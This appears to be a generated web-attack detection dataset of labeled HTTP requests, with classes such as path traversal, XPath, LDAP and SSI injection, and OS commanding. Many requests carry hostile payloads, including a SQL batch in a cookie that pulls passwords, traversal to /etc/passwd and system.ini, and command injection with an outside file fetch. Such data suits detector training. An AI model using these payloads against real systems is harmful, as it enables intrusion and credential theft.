Cookie: A2=k e\w5>y~;4g7kE0HJ=t 2ejst-;j0mjffrt=';     begin   declare     @ret    varchar(8000)     set    @ret=':'   select @ret=@ret+' '+aiiiiips+'/'+password    from     lor4ss    where    cehp>@ret     select    @ret as    ret   into     foo     end--;.8PMR=cta
Cookie2: $Version="3"
Date: Tue, 20 Feb 07 10:00:49 UTC
ETag: W/"Ctmg8ywauFEj9DLIECq6"
Expect: 43ubo
From: y50ayc@nuqbmit.cz
If-Unmodified-Since: Thu, 08 Dec 05 15:52:53 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Mar 09 22:31:08 CET
Max-Forwards: 27
Pragma: o=ecrp
Proxy-Authorization: Digest username="eDiibrsi"
Authorization: Digest opaque="lel3"
Range: 866-,2-448736,67150-78210
Referer: /n2hcNh5n.css
TE: trailers,trailers,gzip
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 0.6; rl-al; rv:5.3.5) Gecko/61195977
UA-Disp: 811,9971,8
UA-Pixels: 952x987
Transfer-Encoding: identity
X-Serial-Number: 2573337780
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

_homej.B9accept4X=ie$ heey etc&a9apLeNhae97ts=iheoTlsaformwindow.openAqo&tbRthermld6=158446359&yidSoth8ndj=5~to&suz9=oNee6TieulupCy6&hh8i43thao3=b&wmirnm2oeie33E=cgFdFbj@&ui1rwt=0759913395&hr6rleaeuhsa=uspeohrws4d5eurd&notONrtilesN3rw=9065049&dkdyqnfGeor=X&LUdgttfd6gc7=uetcstrep&a9nqentybr1ujr=8uc&one9sbwiaee=njWiQ0s

End - Id: 42792
Start - Id: 44850
class: PathTransversal
GET /n7s5rrvnnh1enacrnee4/s6qnVWKVKL_L/3oteeTsarat/2bnE8Ec4.png?lhttqEUuehr=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F&e8ibee=760317&62c=ddtn&ikrtau=a6rwewC&dquNSg2LEl3a=98&46eeQeei35nR=t%5C9uiheunion%40hvshutdown%5Dadhf&@2bXa.nEFUFM=79&hwhytgfseem9nk=to%5C&e0s=id%29na HTTP/1.1
Host: 34.164.144.213
Connection: jcLit
Accept: */*
Accept-Charset: macintosh;q=0.0, iso-8859-15
Accept-Encoding: gzip;q=0.7, gzip
Accept-Language: 5sRiSeb-kaica, tui-tHaite;q=0.3, sdrsa-Bn0ter
Cache-Control: max-stale=3
Client-ip: 95.241.148.239
Cookie: D5bnmeI8rssIPq=k1tljheyS11vmnAr0;him=b;5rienerr31a=s3sqKNT;aowc5h2Gsisa=41278851;1snrEmFe=iQY0
Cookie2: $Version="94"
Date: Thu, 21 Jul 05 17:32:09 UTC
ETag: W/"eWSmgy4O4E8KbW15NvP"
Expect: 100-continue
From: tAozEH@Asmp.net
If-Modified-Since: Sat, 24 Apr 10 01:24:06 CET
If-Unmodified-Since: Mon, 02 Jul 07 16:23:38 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Nov 05 09:04:19 GMT
Max-Forwards: 8753
MIME-Version: 3.5
Pragma: hhn=eizS
Proxy-Authorization: Basic MG5lZXNrc3Q6Zmtab3ZsczE=
Authorization: NTLM NTZSZG5tYXRkYmtpZ3RsYXVvdGZmY2FhZGllb2RsdDVkc3VpaW9IaHo=
Range: 3752-,303-8,-33345
Referer: /ghhnnet/O8Eu/orv1H9.conf
TE: gzip;q=0.2,trailers
Trailer: From
User-Agent: Mozilla/0.0 (Machintosh; U; PPC 2.8; sa-Ie; rv:3.9.4) Gecko/36999914
UA-CPU: StrongARM
UA-Disp: 4175,8952,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: 4.2 www.aaev.htm
Transfer-Encoding: deflate
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 141 5.122.155.98 "97dso" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44850
Start - Id: 49799
class: XPathInjection
GET /kcCH_sgYSxdwMEl/ChaniXonnsr/az_/eFq240c@Yi0Zsx/gz2@CF.CmLTrO/RaLxttntpee1fsede/ba/nCk/hFrS9qgG/aTcVtbodyperlTxg/emGM_AgHc.bin?rorefcsoer=%5Bot&vregfapgocelixl=sg8R6&hp4=oku%27coag&i2Ieeeg=rcpnEe%7Elog4ed&jform_Puynevt6=853737667&ei=u6ULBDXBi&uc2jce4eneua=1zenecho%7Em&hUenege=5q&LdM0dB0q4QkVw=78993351&tedslSl=y4caccess_logC%24Qdnj&sksanre1sel=Mscript3tiisii+aslo%27%5Dbc%5B%7E&nrr8aaiylttgt=644687&9mgrseNlNai=eiee&7osSvgsydsnan=8Nh%27++++or+gooU1b%2Fea3loN%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D696%5D++++or+%27t3vwyoe%27++%3D++%27&pk3shomejQ3document=tre4 HTTP/1.0
Host: 220.227.237.131:80
Connection: close
Accept: audio/*;q=0.6, image/*;q=0.4
Accept-Charset: cp-950;q=0.1, big5, x-mac-hebrew;q=0.5
Accept-Encoding: 
Accept-Language: oEsgoia-dq32mq;q=0.2, hhii-egg;q=0.2, vl-ka;q=0.2
Cache-Control: no-transform
Client-ip: 41.236.97.233
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="71"
Date: Sun, 04 Oct 09 02:33:28 GMT
ETag: "G2lvDzt3GUzDs0U4"
Expect: 100-continue
From: ic2oxryy@hens5ahgle.org
If-Modified-Since: Mon, 22 Sep 08 15:58:08 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:18:36 GMT
If-Match: *
If-None-Match: "pGRGra8HOg7T2Qr2"
If-Range: Mon, 03 Jan 05 22:40:52 CET
Max-Forwards: 59
MIME-Version: 1.9
Pragma: r0eas=ytianmo
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 1-,586-,-3399
Referer: /diyhweer/enarihi/iood/anlt/tnae.php3
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 6.0; ii-xR; rv:8.4.2) Gecko/06512906
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6139x931
Via: 7.1 102.99.188.251, FTP/1.4 www.nh5s.gif
Transfer-Encoding: deflate
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 09611302404410791541
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49799
Start - Id: 45078
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: 27.80.124.4
Connection: keep-alive
Accept: text/plain
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ea4-tno3ti;q=0.0, no2-fte, 4reeGstc-amjeb, hbe-ia2inpf
Cache-Control: no-store
Client-ip: 101.182.197.221
Cookie: Sand@uBstyle=602505
Cookie2: $Version="785"
Date: Thu, 07 Dec 06 07:25:10 GMT
ETag: "0GbJoMCi@JTjqEsBGN"
Expect: 100-continue
From: hn2w6xt1@ocg8cedowl.net
If-Modified-Since: Mon, 14 Nov 05 03:21:58 GMT
If-Unmodified-Since: Tue, 14 Apr 09 19:07:45 UTC
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 7
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: NTLM bnJuemVma25tY3JTcm5abm1lb3RoYXRlbm5pZm9yb25sMkU=
Range: 51016-,-10087
Referer: http://www.oeipoP.de/ndace/jitm/Hhtnneim/8moer/attwca.css
TE: trailers,chunked
Trailer: Range
User-Agent: ofRFln http://www.p28yTh2.com
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 003x764
Via: HTTP/8.1 www.3dnajra.htm
Transfer-Encoding: compress
Upgrade: nadi/5.9, zccv3/4.5, 3E2ei/5.6
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45078
Start - Id: 46127
class: PathTransversal
GET /xwp0tVPLzF5z7juI/psNzOlrZ@g/jv2q6xUXvVILCtRhA.sh?at=tboot.inir5&ii=06&ihoel=vXhroS&naieefm=iTtNioglraY&jvXxml_o=31185&Msr=%2Fetc%2Fpasswd HTTP/1.1
Host: www.es1amws.it
Connection: e0og0zhd
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.3
Cache-Control: max-age=34253
Date: Sun, 27 Dec 09 10:08:44 GMT
ETag: W/"L3OoBM0r1pRvJnxsFE0"
Expect: 100-continue
If-Unmodified-Since: Mon, 17 Oct 05 06:14:50 GMT
If-Range: Sat, 23 Sep 06 09:38:22 GMT
Pragma: byd=bdsaos
Proxy-Authorization: Digest algorithm=MD5-sess
Referer: /uofiihl/lszM6o8.gif
User-Agent: Mozilla/2.8 (compatible; Konqueror/1.0; Win98; gaTfr4e)
Transfer-Encoding: ihnh9t

null

End - Id: 46127
Start - Id: 44542
class: OsCommanding
GET /bin/bho.pl/seite=;cat eshop.pl|? HTTP/1.1
Host: www.iviaoU.biz:80
Connection: etuToot
Accept: text/html;q=0.0, audio/*
Accept-Charset: windows-874, iso-8859-1, windows-1258;q=0.5, iso-8859-7;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 15.83.253.70
Cookie: a2wbk4cn=ii2nle5yoevlb;-8wfE9Dk=nst
Date: Sun, 13 Jan 08 09:20:36 GMT
ETag: "jkPmPul2szt6mLKeLP"
If-Modified-Since: Sat, 07 Jan 06 17:24:40 UTC
If-Match: "qpotTk7zkZ.rWR.2l5"
If-None-Match: "bQXwuKY3N2uBnpfm"
If-Range: *
Max-Forwards: 01
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: Basic ckxodDpzbUVu
Range: -06354,383-6635,26244-
Referer: http://www.oSns.net/tl8us/ewrolq/geic.mspx
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.6 (Windows; U; Win98 5.8; iO-sk; rv:6.1.9) Gecko/30331040
UA-Pixels: 069x3705
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: gzip
Warning: 779 79.125.87.32 "msD320sj" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44542
Start - Id: 39206
class: SSI
POST /x@r8TFfzu0GahzAjK-/XoJ@1Chdiv7owJ./3opa6xre/spGtd/wDD2OeveHAueE/OCVlikeperlouUyO11P/oeae7lEdngaddieeS/mea5ejttrp8tfhsioa.jpg? HTTP/1.0
Content-Length: 512
Content-Language: aer
Content-Encoding: deflate
Content-Location: http://tlRoat.cz/psat/ihootttr/snfNow/csPnof2t/aunmz.tar
Content-MD5: bmlkbGFkaGRubjRlbmVFbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Feb 07 11:50:07 UTC
Last-Modified: Sun, 31 Dec 06 07:04:36 CET
Host: 121.105.80.3:04
Connection: Aennlo9l
Accept: */*;q=0.3
Accept-Charset: x-mac-roman;q=0.6, utf-7;q=0.7, cp-936, isiri-3342
Accept-Encoding: compress;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 79.240.86.120
Cookie: at8UeamI=n%;tHrEdtofmnhsxnh=as;mdeunlts=8011793;Dj2Tt=9600849
Cookie2: $Version="690"
Date: Sat, 17 Oct 09 12:14:42 GMT
ETag: W/"lzGhn@mi-0MinV58F32t"
Expect: 100-continue
From: egngmnl@let9lo.net
If-Modified-Since: Sat, 05 Nov 05 01:52:11 UTC
If-Unmodified-Since: Wed, 22 Oct 08 13:52:41 UTC
If-Match: "R@zhyIAS3mnS-4R"
If-None-Match: *
If-Range: *
Max-Forwards: 7565
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: Digest uri=/lse0c/orjyaad/igpkruue.rar
Range: -6444
Referer: /4i5leenE/ul4gm/wr3erlt/thig.pdf
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 7.7; tg-es; rv:5.8.8) Gecko/66384045
UA-Disp: 375,7789,32
UA-Color: color16
UA-Pixels: 466x9263
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: nsek
Upgrade: asb1aa/1.2, r8yiro/1.2, cegtdl/0.6, Nmfqi7/7.9
Warning: 080 161.106.107.38 "ptynoda1w" "Wed, 05 Oct 05 18:34:52 GMT"
X-Forwarded-For: 10.24.21.76
X-Serial-Number: 4765226560917916
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9lrEede=paraEi&9fr4i=<!--#email fromhost="www.egn5eI0e.com" tohost="mailbox.xEnFt.com" message="ercc3e 2kleew 8wa kmb1aR" fromaddress="tcta.com" toaddress="htsc.wtco.com" subject="f" sender="kNao.com" replyto="uS5aga.com" cc="5y" inreplyto="berr Nbr biael" id="Or6tmail" -->&ntcnirottene=nctohd7deenidqol&y28s8raO8tf=45938&saiwlsl7modxdww=7721&coaeaeco2sbeoI=092888046&ZCLvarM=eOUevy0&icieanl9e=A &ekmeehArS=0786&kz3drdydEAHfbz=7976873384

End - Id: 39206
Start - Id: 45071
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: 41.44.183.105:1
Connection: close
Accept: application/x-tar;q=0.3, video/*
Accept-Charset: iso-8859-8-i, windows-1255;q=0.5, cp-950;q=0.9
Accept-Encoding: 
Accept-Language: s5n-q;q=0.3, eemgi-m, rrr5grmt-oetuer
Cache-Control: min-fresh=1
Client-ip: 4.109.212.12
Cookie: trptb=Pti jtanl;RYCVQYNOXVVt=fnirT6ctb t 8Eusr@iframeqs;ieanosoEwyrj3=ihfcoN;yrSe=8077760233;r5a3=4s
Cookie2: $Version="785"
Date: Sat, 12 Jul 08 09:32:00 UTC
ETag: "_uREHyn1qc_Dj7YZg"
Expect: 100-continue
From: 8gV2@oyweendsp.ch
If-Modified-Since: Mon, 26 Apr 10 01:37:54 UTC
If-Unmodified-Since: Tue, 20 Apr 10 07:58:32 UTC
If-Match: "eEZdOK.TjNBX7Yo"
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: "qU@ge.7zRiFICkqb"
Max-Forwards: 53
MIME-Version: 4.3
Pragma: uren=hno
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: NTLM Z2U4WG9ld2lyZ2JydWNlcGlhb2hURW5MM2xuN3JzZXV0ZGFyYWFyZg==
Range: 51016-,-10087
Referer: http://www.baeitl.org/ueSlce/aypea/eDgwi.txt
TE: trailers
Trailer: Host
User-Agent: Mozilla/7.3 (X11; U; Linux i586 9.1; oo-iY; rv:8.2.4) Gecko/59005025
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: 6.4 130.235.233.181
Transfer-Encoding: 0SnIee; ouft77op=xnh6xor
Upgrade: ttl/4.7, aedaR/4.8, n3bej/5.3
Warning: 634 220.181.199.153 "EI6etnt" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45071
Start - Id: 45203
class: PathTransversal
GET /./? HTTP/1.0
Host: www.ve2uraitl.uk
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: max-age=52877
Client-ip: 125.250.245.160
Cookie: ehnjoeNoxkea2=163;fns8sAEisN=78327121;caOohumG=eod;ahoSiefhasoasd=nht;@2OQ4in=oo s~<o|w<|rvnS ss ;xbhsdt=insert
Cookie2: $Version="6"
Date: Wed, 20 Oct 04 13:08:06 GMT
ETag: W/"LyCJ_rPrQiUKw7_E"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Mon, 20 Apr 09 18:34:08 GMT
If-Unmodified-Since: Sun, 22 Aug 04 24:26:00 CET
If-Match: *
If-None-Match: "SNI-U1r5I.tNzdBLFWk"
If-Range: Sun, 15 Feb 09 18:41:00 CET
Max-Forwards: 185
MIME-Version: 1.6
Pragma: xi8l='toq'
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM b3VlYW9ZbDN0QWFvdGNpN2RudGVzbm5laVdudWxFamVjb1JoeGVs
Range: 706278-,584316-,-67
Referer: /mTiHhgW/ntxdiNu.tiff
TE: chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: wskooisotch
UA-CPU: 68000
UA-Disp: 749,556,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2083x0053
Via: 2.3 224.133.118.188
Transfer-Encoding: deflate
Upgrade: eimdea/6.6
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 12.15.76.12
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45203
Start - Id: 49212
class: XPathInjection
GET /sZN_tgKN@v/vU5466iSMRjfmu5b2h4/e6iiqomSvqp4Z/pnhpe4aqeiarsSzBec/Qk6Y3Df0xt0yYN/rytIdXlckgj9RbUi/zagIhakUa/SEt/eugxdrgWae/zsEWLPupdatew/f9xR.KVX18/aadE5a7.mspx?isth=hctarnMl&mItcrzteSi1t=EWntt2riaoLpo&shte2guwknt=tddsel%27+or+++++1%3C+++hb%2Fn%2Fmofc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D++or++++%27dfi%27++++%3D+%27&eeaa=au45-9ech1&nasei=drwhd HTTP/1.0
Host: www.nhLfben9aa.it
Connection: U5ewdiME
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: n-0dttgt, tns-Et;q=0.3, d5hgma4n-padeut2;q=0.2
Cache-Control: no-store
Client-ip: 107.0.134.67
Cookie: dyRecrlnddaulH=ontaieah;5XZcR=formAusA=n4plwot;LNB@PQEUUvu=e(nf;cvrh6eds=>);hdm=3;sMb5oyocnp=046918
Cookie2: $Version="19"
Date: Sat, 20 Jan 07 04:25:25 UTC
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: h28tt
From: lCae@ni91.be
If-Modified-Since: Sun, 02 Oct 05 15:36:30 GMT
If-Unmodified-Since: Tue, 23 Nov 04 18:26:08 GMT
If-Match: *
If-None-Match: "oMgVJMZ8dtgAJxGiifb"
If-Range: Thu, 08 May 08 14:14:29 CET
Max-Forwards: 889
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Digest cnonce="ltAratn"
Range: -392691
Referer: http://ylsrmolo.be/issq4eCI/tosn/oaatusyt/eoSir3m/dddThdi.mpeg
TE: gzip;q=0.4,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/2.5 (X11; U; Unix 3.5; er-Nq; rv:3.6.2) Gecko/53094692
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6245x946
Via: 5.2 www.om0oi.jpg, FTP/1.7 www.kioa.js, HTTP/4.0 www.me2lr.tiff
Transfer-Encoding: compress
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49212
Start - Id: 38557
class: LdapInjection
GET /b-lZM4f/TDv@SxK.htm?ssenHLAorD=feeea%29%28+++%7C+%28ne%3D*%29 HTTP/1.1
Host: 158.57.194.53:3160
Connection: wa8Eitry
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.3, windows-1257, x-mac-roman;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=710
Client-ip: 40.99.33.206
Cookie: md=r0oo;meEI=83070;iacvemaneet9Amc=nmeb9openexecllhug mar
Cookie2: $Version="7"
Date: Fri, 05 Sep 08 09:01:34 GMT
ETag: W/"@tyb3ncQYBWwihXP"
Expect: elny
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Tue, 08 Apr 08 15:10:53 UTC
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: "i-3uQdIjYX_@OZpvIJP"
If-None-Match: "-QTDv4VOhK9LqqzOgu"
If-Range: *
Max-Forwards: 284
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: NTLM eGh3aFRJZDJpdWE5dW1yc29lYW9zbzVoTm94SU5uU2hieWRhZGFuZQ==
Range: -956,35-
Referer: /lalze/Zohw/tdieliaR.ace
TE: gzip
Trailer: Transfer-Encoding
User-Agent: y5sTfssd (uVfB.F; szjSUCoXuc; iAfIWLc)
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/2.9 www.idlwgT.css, HTTP/1.9 www.iungs.htm
Transfer-Encoding: uds5Fy; yiecat2=LavaT7a
Upgrade: AwoFtN/5.6, vmGs2/6.3, lsee/0.5, mxjple/8.1
Warning: 417 www.racf.css "lane" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38557
Start - Id: 43255
class: OsCommanding
GET /eolb6uxYlirserkgqka/efavta/axLShZXIR3BE/UstdinjT/htoatseomtiutoen/XdbodyXandQhtaccesscript0qSidJ3/3E/ha7fNgzNE@.lOyh1UGS/eAH.vIYZ21OGe/6q3fHxtSAfXhadnPw/hhWIRUoCCV/cmE.jpeg?ssltkhx=oamdcoo1it&tdw2ihs=l+dle&tnYmEmu=ooiiNokxat5&uorlrdwmt=de%27boot.inixp_&tccaIjT=+i%5BaetttSnsaqv%27&mo0r=034&JTbO01sock_streamESIgV=mwp-0stdin4tOhboot.ini&OplocationXSQWNU=slr5o&dwrN0L6=%5Cnuftp+-p+www.made.com+++++%2Fieseic%2Froarerststti%2Fllns%2Fitnens%2Ftining%2Fnt HTTP/1.1
Host: www.mOI2ofkNnn.it
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 234.82.248.6
Cookie: eWce=ataad(6emc;hessuno4sdca=iru1toeB
Cookie2: $Version="5"
Date: Thu, 22 Apr 10 15:37:25 UTC
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: 100-continue
From: w5itei@2re1ofAi.st
If-Modified-Since: Wed, 20 Jul 05 07:28:22 CET
If-Unmodified-Since: Sat, 29 Nov 08 07:59:35 CET
If-Match: "Qh1YHB@JYy05@Czu"
If-None-Match: *
If-Range: Fri, 16 Oct 09 22:04:47 GMT
Max-Forwards: 88
MIME-Version: 8.0
Pragma: efro='teo'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: cmet mbhob=inoGeie
Range: -640387
Referer: /n7Nge/erhltgl.php4
TE: chunked;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: qm8evm/6.1
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 31z7/5.5 www.iczutte1.gif, 8.4 3.2.111.114, fdjnys/6.4 www.s8aal.jpg
Transfer-Encoding: compress
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43255
Start - Id: 39168
class: SSI
GET /ebii/tAz/yetd1s5heagC/dmeta/322sXvFIQNmVVur/iteescerrlRnae.jpeg?htnejbsek9seat=avhFCi&8uro=mi2irhth%3Ensmj%2Bd8glep HTTP/1.0
Host: 48.56.68.200:1518
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.9, utf-7, euc-kr;q=0.7, iso-8859-6
Accept-Encoding: *
Accept-Language: aatt9t8t-lenrmiT;q=0.9, tpmeta-atwt2i, vho-ytamnSnl, besalptk-t8amRt;q=0.4
Client-ip: 255.40.153.231
Cookie: dlprt=33598458;zzbopctndcne=v%n;vupassthruW-=<!--#email fromhost="www.sol0lnta.com" tohost="mailbox.ahswe.com" message="3oeinb nrmi1c itql tEiod" fromaddress="vrea.com" toaddress="reb4.6wsp.com" subject="aa" sender="Soqt.com" replyto="oer2e.com" cc="tiUi" inreplyto="i4aeh csa zn4" id="2aokmail" -->;tAu9ms=t1allvfey0emnz
Date: Fri, 07 Jan 05 15:27:31 CET
ETag: "b-Nt9tdIh9RfFhekz"
If-Unmodified-Since: Tue, 21 Dec 04 01:47:52 CET
Max-Forwards: 0
Range: 849-3,316-,76790-12674
Referer: /FeedF/xkaa/ybtcsd/dCls/omgwrpa.txt
User-Agent: dk4ercladL (eZgEVSui4; lnNpB5t; r18Gf6; seFqHcmqi0)
Transfer-Encoding: loiVy0; bioozim=esttHer
Upgrade: mam2Ns/7.0, lc6ayd/1.2, ehsio/1.1, ier/7.6, betmD/5.3
----: -----------------------

null

End - Id: 39168
Start - Id: 38272
class: LdapInjection
GET /ee0a5fu/rehtaiQbehTco/ldVSUY86/erwbeysateNm/bdATYyoolau4tthhuVew/ax8j9X.iza/cYZam7nilhF6ae9d/hm@y.P41Kx43O.jpg?dtrNflti=%29+++%28++++%7C+++%288s%3Ddniu*%29&utfhioiskeecnem=8%40i_SA7%40uEj&oegeeepnr0a=er&nsO5te=nesots&bXOvvOM7=btaruItsaypac&9eaYauaotsn=ruehgerelt&eyRarutn=iyeA&ibapsheMi=oEadpeErcyiAr HTTP/1.0
Host: www.fynrtc.be:8
Connection: iXomewol
Accept: text/html, audio/*, application/rtf
Accept-Charset: windows-1255;q=0.0, windows-1252, x-mac-ce;q=0.2, utf-7, koi8-r
Accept-Encoding: identity;q=0.8, identity;q=0.2
Accept-Language: hihwtlie-Tatngi;q=0.8, n7de-iinih;q=0.4
Cache-Control: ogcer=ot
Client-ip: 227.248.33.223
Cookie: 5nlqliaszuft=0;caiicdpectp4hlN=tw)t;te=56854624;mena=cLJefOT;aaCeqmwcb=99173772
Cookie2: $Version="30"
Date: Mon, 08 Aug 05 10:37:25 CET
ETag: "YAtQRZ8M5wKeOH1a4o"
Expect: 100-continue
From: iaon@um9ltetugp.biz
If-Modified-Since: Fri, 18 May 07 18:16:33 GMT
If-Unmodified-Since: Thu, 31 Aug 06 08:57:45 GMT
If-Match: "XdH2l0gCAt6oyvun6"
If-None-Match: *
If-Range: Tue, 16 Nov 04 18:44:11 GMT
Max-Forwards: 2
MIME-Version: 0.2
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Basic RG90bWQ6OWVhZXRzaA==
Range: 2323-,18-
Referer: /jdio/nete/nacE/4b1h.cgi
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: oodeTaedyefire0
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: HTTP/2.2 www.ue71f30o.css
Transfer-Encoding: deflate
Upgrade: o4f/8.5, ihuE/9.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 165.116.155.114
X-Serial-Number: 5189731
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38272
Start - Id: 44642
class: PathTransversal
GET /Z-./ies7ttaswrreil/ghraEieeis1predu.png?as=en&W.BU-elFVIi=%28&VrIkdeleteNntmp=262&iiz-J=1owAJ5dw&ndwcor6slnlaVt=ndDze5SW00S&Gpui=n&deenau=adddhy6&en5RdodKnt=tls30c+&access_logadminUbV8wIMe=It9ils&yLFD=7so8a HTTP/1.1
Host: www.asan.gov
Connection: close
Accept: image/*;q=0.3, audio/*;q=0.3
Accept-Charset: x-mac-arabic, iso-8859-6
Accept-Encoding: *;q=0.0
Accept-Language: ../../UBData/Members/members.grp%00
Cache-Control: ss='Ne'
Client-ip: 223.244.181.80
Cookie: y23rOzqdi=nbwoRTRc7Pse;3oaaEnrwran9gy=58;GupdatefN0-TOBe=93
Cookie2: $Version="302"
Date: Tue, 13 Jul 04 05:15:57 CET
ETag: "dpXSh8Z-yIwmS16F7"
Expect: rz4nngt=9nmgu;Xsnsdc
From: sene@eakbEa.biz
If-Modified-Since: Thu, 22 Jun 06 01:03:40 CET
If-Unmodified-Since: Mon, 08 May 06 01:58:23 CET
If-Match: *
If-None-Match: "uxNBcAY0sXQKRTJskWn"
If-Range: Sat, 16 Oct 04 17:28:25 GMT
Max-Forwards: 4
